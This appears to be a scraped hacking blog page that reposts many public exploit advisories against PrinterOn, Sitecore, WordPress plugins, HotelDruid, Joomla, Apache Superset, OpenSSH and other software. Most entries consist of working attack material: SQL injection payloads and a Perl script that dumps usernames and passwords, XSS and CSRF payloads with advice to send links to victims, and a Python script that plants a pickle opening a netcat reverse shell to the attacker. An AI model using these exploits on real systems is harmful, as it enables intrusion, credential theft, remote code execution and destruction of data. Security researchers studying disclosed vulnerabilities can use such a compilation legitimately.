# Exploit Author: bzyo
# CVE: CVE-2018-19936
# Twitter: @bzyo_
# Exploit Title: PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion
# Date: 12-07-18
# Vulnerable Software: PrinterOn Enterprise 4.1.4
# Vendor Homepage: https://www.printeron.com/
# Version: 4.1.4
Tested On
---------------------------------------------------------------------
PrinterOn Enterprise 4.1.4
Windows 2012 R2 Datacenter
Software running under User Account: PONservice (part of local administrators group)
Software Notes
---------------------------------------------------------------------
Per the PrinterOn Enterprise 4.1.4 Installation Guide on Page 10, a local administrator account is required to run the software.
On a default installation, the Post Print Option is to “Delete From Store”. Meaning, if you upload a file to print, this file is deleted immediately after it is printed.
When printing as a Guest or Authenticated user, you have the choice of either uploading a file to be printed or entering a Web Page. The file type you upload or supply via URI needs to be supported by the application in order for it to process and print. Per page 11 of the installation guide, under Recommended Software, it’s advised to install an application such as Microsoft Word to print .docx documents. There is also some additional configuration needed to be able to print specific file types otherwise you receive an error such as “This type of file cannot be processed by your service”.
Vulnerability
---------------------------------------------------------------------
When either printing as a Guest (when enabled) or as an Authenticated user via the CPS URL https://<hostname or ip>/cps, the user printing has the ability to delete any file on the host system that isn’t currently in use by the system itself. The field to enter a web page does not properly check the URI being entered, as such the user can enter a system file path and delete a file on the system.
Exploit
---------------------------------------------------------------------
Login as either Guest or an Authenticated user to print
https://<hostname or ip>/cps
Choose any printer
Entering a system path to a file in the web page field
Examples:
C:\Users\Administrator\Desktop\DoNotDelete.txt
C:\Program Files (x86)\PrinterOn Corporation\Apache Tomcat\Conf\web.xml
Send the print job, an error will show
Check system, file is deleted
Impact
---------------------------------------------------------------------
By deleting specific files the application, and possibly the host system, can become unusable.
Timeline
---------------------------------------------------------------------
10-22-18: Vendor notified of vulnerability
10-22-18: Initial response from vendor
10-23-18: PoC submitted
10-25-18: Vendor to pass along to Product team
11-??-18: New version released
12-03-18: Tested and Confirmed with vendor vulnerability fixed in update
12-07-18: Submitted public disclosure
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863587957
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit title: Sitecore CMS v8.2 multiple vulnerabilities
Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net <%20usman@xc0re.net>
Vendor Homepage: http://www.sitecore.net/
Disclaimer: Everything mentioned below is for educational puposes. The
vulnerability details are mentioned as is. I would not be held responsible
for any misuse of this information.
Summary:
Multiple vulnerabilities were found in the Sitecore product. The
vulnerabilities include two instances of arbitrary file access and once
instance of reflected cosssite scripting.
1: Arbitrary file access:
- Description:
The vulnerability lies in the tools which can be accessed via the
administrator user. The vulnerability exists because there is no bound
check for absolute path in the application, that is, if the absolute path
is provided to the vulnerable URL, it reads the path and shows the contents
of the file requested.
- Exploit:
1. Once authenticated as the administrator perform a GET request to the
followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini
2. Once authenticated as the administrator perform a POST request to the
followiung URL:
POST /sitecore/admin/LinqScratchPad.aspx
HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1
__VIEWSTATE= &__VIEWSTATEGENERATOR=
&__EVENTVALIDATION=&LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%
5Cwin.ini&Fetch=
2. Reflected Cross-site Scripting:
- Description:
The application does not sanatize the USER input which allows a normal
authenticated user to exploit this vulnerability.
- Exploit:
POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>
&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A///sitecore/shell/Applications/Tools/Run&__CSRFTOKEN=
&__VIEWSTATE=&__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(
document.cookie)%3B%22%3E%3C%2Fiframe%3E
# Exploit Title: WP AutoSuggest 0.24 - SQL Injection
# Date: 01-12-2018
# Software Link: https://wordpress.org/plugins/wp-autosuggest/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 0.24
# Category: webapps
SQL Injection
File: autosuggest.php
Vulnerable code:
if (isset($_GET['wpas_keys'])) {
$wpas_keys = $_GET['wpas_keys'];
}
...
$wpas_keys = str_replace(' ','%',$wpas_keys);
$pageposts = $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE (post_title LIKE '%$wpas_keys%') AND post_status = 'publish' ORDER BY post_date DESC");
Exploitation example:
sqlmap -u "http://URL/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1" --technique BT --dbms MYSQL --risk 3 --level 5 -p wpas_keys --tamper space2comment --sql-shell
# Exploit Title: SQL Injection in HotelDruid version 2.3
# Google Dork: N/A
# Date: 9-12-2018
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: http://www.hoteldruid.com
# Software Link: https://sourceforge.net/projects/hoteldruid/
# Version: 2.3 (REQUIRED)
# Tested on: Windows x64/ Kali linux x64
# CVE : N/A
Description:
Hoteldruid is an open source program for hotel management (property
management software) developed by DigitalDruid.Net
Vulnerability Description:
the "id_utente_mod" parameter is Vulnerable to SQL Injection Vulnerability.
Payload:
1' AND EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT
(ELT(5=5,1)))))-- -
Poc: http://hoteldruid/gestione_utenti.php?anno=2018&id_sessione=&modifica_gruppi=SI&id_utente_mod=1%27%20AND%20EXTRACTVALUE(5,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT%20(ELT(5=5,1)))))--%20%20-
# Exploit Title: Apache OFBiz v16.11.05 - Stored Cross-Site Scripting Vulnerability
# Google Dork: N/A
# Date: 09 - December - 2018
# Exploit Author: DKM
# Vendor Homepage: https://ofbiz.apache.org/
# Software Link: https://www.apache.org/dyn/closer.lua/ofbiz/apache-ofbiz-16.11.05.zip
# Version: v16.11.05
# Tested on: Windows 10/Ubuntu/Kali Linux
# CVE : N/A
# Description:
A Stored Cross Site Scripting vulnerability is found in the "Text Data" Field within the 'ViewForumMessage' section.
This is because the application does not properly sanitise the users input.
# Steps to Reproduce:
1. Login into the E-Commerce application as any user.
2. Open or the URL will be(https://localhost:8443/ecommerce/control/AddForumThread?forumId=ASK)
3. In "Short Name" give enything you want, Now scroll down and click on "Source" Button, Now in "Text Data" field give payload as: <script>alert(1)</script> and click on "Add"
4. In the next page click on "View" respective to the newly added data and one can see that our XSS Payload gets executed.
5. The same things happens to the message reply page on "ViewForumMessage" which further confirms the presence of stored XSS.
Disclaimer:
[This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
Attack type : Remote
Patch Status : Unpatched
Exploitation :
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# Twitter : http://twitter.com/emuess
# Original Advisory DATE: [29/01/2014]
# Publishing of Exploit Date : [17/02/2014]
Description
===========
It is possible to inject malicious HTML Elements into the email and
cause a Cross site Scripting (XSS) payload to be executed.
Tested ICEWARP Client Versions (http://www.icewarp.com/)
============================
Version : 11.0.0.0 (2014-01-25) x64
& 10.3.4
Browser Used
=============
Mozilla Firefox 26.0
Proof Of Concept
============
Please find the details about the exploit : http://xc0re.net/blog/?p=363
Proof Of Concept
=================
For Version: ICEWARP 11.0.0
><object data=”data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+”></object>>
><EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>>
Note:
For Version: ICEWARP 10.3.4
<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>
# Exploit Title: Mozilla Firefox 63.0.1 - Denial of Service (PoC)
# Date: 2018-11-29
# Exploit Author: SAIKUMAR CHEBROLU
# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/
# Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1504512
# Version: Firefox 63.0.1
# Tested on: Windows 10
# CVE : No CVE is been assigned to this bug.
# To exploit this vulnerability please follow the below steps.
# Firefox is being crashed, when it tried to process the chunked data. when Transfer-Encoding header
# is used, we suppose to send the data in the chunks form. When all the chunks being transferred,
# we need to tell the client with chunk length zero. so that it understands chunked stream completed.
# But if we send the data after sending zero length, then firefox not able to understand it,
# and it being crashed.
# Example:
5
Don't
5
be af
5
firef
5
ox is
0
Crash (after saying it is end, we still sending some data)
\r\n
# here we are saying no chunked data after this.so that it should end with \r\n. But we
# are sending some data after this also. Like
# Steps to reproduce the crash
1)download the firefoxcrash.txt
2)nc -lp 8000 < firefoxcrash.txt
3)browe the url from firefox like http://localhost:8000
4)then close the netcat client. then you will obserev the firefox crash.
# fireforcrash.txt
HTTP/1.1 200 ok
Content-type: application/octet-stream
Content-disposition: attachment; filename="crash.txt"
Transfer-Encoding: chunked
Connection: close
5
I am
5
be a
5
fraid
5
to l
5
ook a
5
t thi
5
s mes
5
sage.
5
It i
5
s com
5
plete
5
ly ha
5
rmles
5
s. Re
5
ally!
0
foobar
# Exploit Title: Joomla! Component JE Photo Gallery 1.1 - SQL Injection
# Dork: N/A
# Date: 2018-11-26
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://joomlaextensions.co.in
# Software Link: http://joomlaextensions.co.in/download/1387375463_JE%20PhotoGallery%20(%20J-%203.0%20).zip
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
#!/usr/bin/perl -w
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
./
(o o)
###############################oOOo-(-)-oOOo###############################
______ _______ ___ _ __ _____ _______ ___________ _ __
/ _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / /
/ // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ /
_/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| /
/___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/
WWW.IHSAN.NET
+
Joomla! Component JE Photo Gallery 1.1 - SQL Injection
############################################################################
";
use LWP::UserAgent;
print "\nTarget:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
$UT="wizjk_users";
$S="index.php?";
$I="tmpl=component&option=com_jephotogallery&view=category&task=fetchimage&categoryid=";
$E="%2d%32%39%20%55%4e%69%6f%6e%20%73%65%4c%45%43%54%20%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%72%6e%61%6d%65%2c%30%78%33%61%2c%70%61%73%73%77%6f%72%64%29%20%46%52%4f%4d%20".$UT."%29%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%4e%75%4c%4c%2c%30%2c%30%2d%2d%20%2d";
$SIE = LWP::UserAgent->new() or die "Could not initialize browser\n";
$SIE->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
$host = $target . "".$S."".$I."".$E."";
$res = $SIE->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/{"id":"(.*?)"/){
print "[+] Success !!!\n";
print "\n[+] Detail : $1\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
# Exploit Title: Budabot 4.0 - Denial of Service (PoC)
# Date: 2018-10-15
# Exploit Author: Ryan Delaney
# Author Contact: ryan.delaney@owasp.org
# Vendor Homepage: http://budabot.com/
# Software Link: http://budabot.com/forum/viewtopic.php?f=8&t=1413
# Version: 0.6 -> 4.0
# Tested on: 4.0
# CVE: CVE-2018-19290
# 1. Description
# In modules/HELPBOT_MODULE in Budabot 0.6 through 4.0, lax syntax validation
# allows remote attackers to perform a command injection attack against the
# PHP daemon with a crafted command, resulting in a denial of service or
# possibly unspecified other impact. In versions before 3.0,
# modules/HELPBOT_MODULE/calc.php has the vulnerable code; in 3.0 and above,
# modules/HELPBOT_MODULE/HelpbotController.class.php has the vulnerable code.
# 2. Proof of Concept
Start the Budabot listener, set valid configuration options, and wait for
the chatbot to announce it's ready in-game.
Send the chatbot a private message containing "!calc 5 x 5", and the
Budabot listener will terminate.
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
# Date: 2018-05-17
# Exploit Author: David May (david.may@semanticbits.com)
# Vendor Homepage: https://superset.apache.org/
# Software Link: https://github.com/apache/incubator-superset
# Version: Any before 0.23
# Tested on: Ubuntu 18.04
# CVE-ID: CVE-2018-8021
# I originally disclosed this to the Apache Superset team back in May, and the fix had already been
# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.
#!/usr/bin/env python
import sys
import os
from lxml import html
import requests
# Change these values to your TCP listener
myIP = '192.168.137.129'
myPort = '8888'
# Credentials must belong to user with 'can Import Dashboards on Superset' privilege
username = 'test'
password = 'test'
# Logic in case script arguments are not given
if len(sys.argv) < 3:
print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')
print('Script Usage:')
print('./supersetrce.py <superset server ip> <superset port>')
sys.exit()
else:
# Script arguments
supersetIP = sys.argv[1]
supersetPort = sys.argv[2]
# Verify these URLs match your environment
login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'
upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'
# Checks to see if file that we are going to write already exists in case this is run more than once
if os.path.isfile('evil.pickle'):
os.remove('evil.pickle')
# Headers that we append to our POST requests
headers_dict = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
'DNT': '1',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
}
# Creates evil pickle file and writes the reverse shell to it
evilPickle = open('evil.pickle','w+')
evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')
evilPickle.close()
# Start a session so we have persistent cookies
session = requests.session()
# Grabs the Login page to parse it for its CSRF token
login_page = session.get(login_URL)
if login_page.status_code != 200:
print('Login page not reached, verify URLs in script')
login_tree = html.fromstring(login_page.content)
csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')
# Form data that is sent in the POST request to Login page
login_data = {
'csrf_token' : csrf_token,
'username' : username,
'password' : password,
}
# Adds the Referer header for the login page
headers_dict['Referer'] = login_URL
# Logon action
login = session.post(login_URL, headers=headers_dict, data=login_data)
# Grabs the Upload page to parse it for its CSRF token
upload_page = session.get(upload_URL)
if upload_page.status_code != 200:
print('Upload page not reached, verify credentials and URLs in script')
upload_tree = html.fromstring(upload_page.content)
csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
# Adds the Referer header for the Upload page
headers_dict['Referer'] = upload_URL
# Upload action
upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})
# Closes the session
session.close()
sys.exit()
# Exploit Title: PHP Server Monitor 3.3.1 - Cross-Site Request Forgery
# Exploit Author: Javier Olmedo
# Website: https://www.sidertia.com
# Date: 2018-11-28
# Google Dork: N/A
# Vendor: https://www.phpservermonitor.org/
# Software Link: https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1
# Affected Version: 3.3.1 and possibly before
# Patched Version: update to 3.3.2
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
# References:
# https://github.com/phpservermon/phpservermon/issues/670
# https://www.sidertia.com/Home/Community/Blog/2018/11/28/Corregidas-las-vulnerabilidades-CSRF-descubiertas-en-PHP-Server-Monitor
# 1. Technical Description:
# PHP Server Monitor version 3.3.1 and possibly before are affected by multiple
# Cross-Site Request Forgery vulnerability, an attacker could remove users, logs,
# and servers.
# 2.1 Proof Of Concept (Delete User):
(Method 1)
Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=user&action=delete&id=[ID]) and send it to the victim.
(Method 2)
Use next form and send it tho the victim.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[PATH]/">
<input type="hidden" name="mod" value="user" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="[ID]" />
<input type="submit" value="Delete User" />
</form>
</body>
</html>
# 2.2 Proof Of Concept (Delete Server):
(Method 1)
Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server&action=delete&id=[ID]) and send it to the victim.
(Method 2)
Use next form and send it tho the victim.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[PATH]/">
<input type="hidden" name="mod" value="server" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="id" value="[ID]" />
<input type="submit" value="Delete Server" />
</form>
</body>
</html>
# 2.3 Proof Of Concept (Delete All Logs):
(Method 1)
Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server_log&action=delete) and send it to the victim.
(Method 2)
Use next form and send it tho the victim.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://[PATH]/">
<input type="hidden" name="mod" value="server_log" />
<input type="hidden" name="action" value="delete" />
<input type="submit" value="Delete All Logs" />
</form>
</body>
</html>
# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download
# Author: @nyxgeek - TrustedSec
# Date: 2018-03-20
# Vendor Homepage: microsoft.com
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517
# CVE: CVE-2018-8474
# Version: Lync:Mac 2011 14.4.3, likely earlier versions
# Tested on: Lync:Mac 2011 14.4.3 (170308)
# Description:
# Force browsing or download via embedded iframe in a chat window. No user
# interaction required. When the iframe contains a web site URL, a new browser
# window of the default browser will open with the URL.
# If the URL is a file, it will download it automatically if it is a permitted
# file type (e.g., zip)
# A write-up can be found at:
# https://www.trustedsec.com/2018/09/full-disclosure-microsoft-lync-for-mac-2011-susceptible-to-forced-browsing-download-attack/
# Requirements: Originating machine needs Lync 2013 SDK installed
# (https://www.microsoft.com/en-us/download/details.aspx?id=36824)
# Timeline of Disclosure:
#
# 07/18/2017 - Reported issue to Microsoft
# 11/22/2017 - Microsoft has reproduced problem
# 03/07/2018 - Microsoft replies that they have decided not to fix, but gave
# their blessing for disclosure
#target user
$target = "user@domain"
$message = "<iframe src='https://www.youtube.com/watch?v=9Rnr70wCQSA'></iframe>"
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
try
{
# you may need to change the location of this DLL
Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
}
catch
{
Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
}
}
# Connect to the local Skype process
try
{
$client = [Microsoft.Lync.Model.LyncClient]::GetClient()
}
catch
{
Write-Host "`nYou need to have Skype open and signed in first"
break
}
#Start Conversation
$msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
#Add the Message
$msg.Add(1,$message)
# Add the contact URI
try
{
$contact = $client.ContactManager.GetContactByUri($target)
}
catch
{
Write-Host "`nFailed to lookup Contact"$target
break
}
# Create a conversation
$convo = $client.ConversationManager.AddConversation()
$convo.AddParticipant($contact) | Out-Null
# Set the message mode as IM
$imModality = $convo.Modalities[1]
# Send the message
$imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
# End the Convo to suppress the UI
$convo.End() | Out-Null
Write-Host "Sent the following message to "$target":`n"$message
# Exploit Title: Wordpress Plugins Advanced-custom-fields 5.7.7 - Cross-Site Scripting
# Google Dork: N/A
# Date: 2018-12-02
# Exploit Author: Loading Kura Kura
# Vendor Homepage: https://www.advancedcustomfields.com/]
# Software Link: https://www.advancedcustomfields.com/
# Version: 5.7.7
# Tested on: Win10 x64/Kali linux x64
# CVE : N/A
# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2.
# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting.
# Paramater: acf_fields[11][label]
# PoC
POST /wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
Content-Length: 2838
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/wordpress/wp-admin/post.php?post=8&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7C74dd4284fad8e2f658d13db3d669d0d61976654b4b9e7b4a820b0156fb018264; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7Cd0b0455678fae203a81b5c23b42dbfa51b0ab665e33607d2b09b1d5d62cc36be; wp-settings-time-1=1543678278; wp-settings-1=mfold%3Do; hblid=gR3SowbFiR0QuMDg3m39N0I6Bo2jr38A; olfsk=olfsk8076045099904943; _gcl_au=1.1.201976856.1543314650
Connection: close
_wpnonce=415211ddca&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf-field-group&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&post_ID=8&meta-box-order-nonce=2cc12cc441&closedpostboxesnonce=bbd0be706b&post_title=xss&samplepermalinknonce=4f1f2ec280&_acf_screen=field_group&_acf_post_id=8&_acf_nonce=191e753914&_acf_validation=0&_acf_changed=1&_acf_delete_fields=0%7C9&original_publish=Update&save=Update&acf_fields%5B11%5D%5BID%5D=11&acf_fields%5B11%5D%5Bkey%5D=field_5c02a79cc0f83&acf_fields%5B11%5D%5Bparent%5D=8&acf_fields%5B11%5D%5Bmenu_order%5D=0&acf_fields%5B11%5D%5Bsave%5D=settings&acf_fields[11][label]=%3Cscript%3Ealert%28%22loadingkurakura%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Bname%5D=%3Cscript%3Ealert%28%22loadingkurakura1%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Btype%5D=text&acf_fields%5B11%5D%5Binstructions%5D=&acf_fields%5B11%5D%5Brequired%5D=0&acf_fields%5B11%5D%5Brequired%5D=1&acf_fields%5B11%5D%5Bdefault_value%5D=&acf_fields%5B11%5D%5Bplaceholder%5D=&acf_fields%5B11%5D%5Bprepend%5D=&acf_fields%5B11%5D%5Bappend%5D=&acf_fields%5B11%5D%5Bmaxlength%5D=&acf_fields%5B11%5D%5Bconditional_logic%5D=0&acf_fields%5B11%5D%5Bwrapper%5D%5Bwidth%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bclass%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bid%5D=&acf_fields%5B10%5D%5BID%5D=10&acf_fields%5B10%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B10%5D%5Bparent%5D=8&acf_fields%5B10%5D%5Bmenu_order%5D=1&acf_fields%5B10%5D%5Bsave%5D=meta&acf_fields%5B12%5D%5BID%5D=12&acf_fields%5B12%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B12%5D%5Bparent%5D=8&acf_fields%5B12%5D%5Bmenu_order%5D=2&acf_fields%5B12%5D%5Bsave%5D=meta&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bparam%5D=post_type&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bvalue%5D=post&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bparam%5D=post_type&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bvalue%5D=post&acf_field_group%5Bactive%5D=0&acf_field_group%5Bactive%5D=1&acf_field_group%5Bstyle%5D=default&acf_field_group%5Bposition%5D=normal&acf_field_group%5Blabel_placement%5D=top&acf_field_group%5Binstruction_placement%5D=label&acf_field_group%5Bmenu_order%5D=0&acf_field_group%5Bdescription%5D=ddd&acf_field_group%5Bhide_on_screen%5D=&acf_field_group%5Bhide_on_screen%5D%5B%5D=the_content&acf_field_group%5Bkey%5D=group_5c02a6cfa31d6&post_name=group_5c02a6cfa31d6
#!/usr/bin/env python2
# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io
# Credits: Matthew Daley, Justin Gardner, Lee David Painter
import argparse, logging, paramiko, socket, sys, os
class InvalidUsername(Exception):
pass
# malicious function to malform packet
def add_boolean(*args, **kwargs):
pass
# function that'll be overwritten to malform the packet
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
# malicious function to overwrite MSG_SERVICE_ACCEPT handler
def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean
return old_service_accept(*args, **kwargs)
# call when username was invalid
def invalid_username(*args, **kwargs):
raise InvalidUsername()
# assign functions to respective handlers
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
# perform authentication with malicious packet and username
def check_user(username):
sock = socket.socket()
sock.connect((args.target, args.port))
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
except paramiko.ssh_exception.SSHException:
print '[!] Failed to negotiate SSH transport'
sys.exit(2)
try:
transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
except InvalidUsername:
print "[-] {} is an invalid username".format(username)
sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
print "[+] {} is a valid username".format(username)
# remove paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument('username', help="Username to check for validity.")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
check_user(args.username)
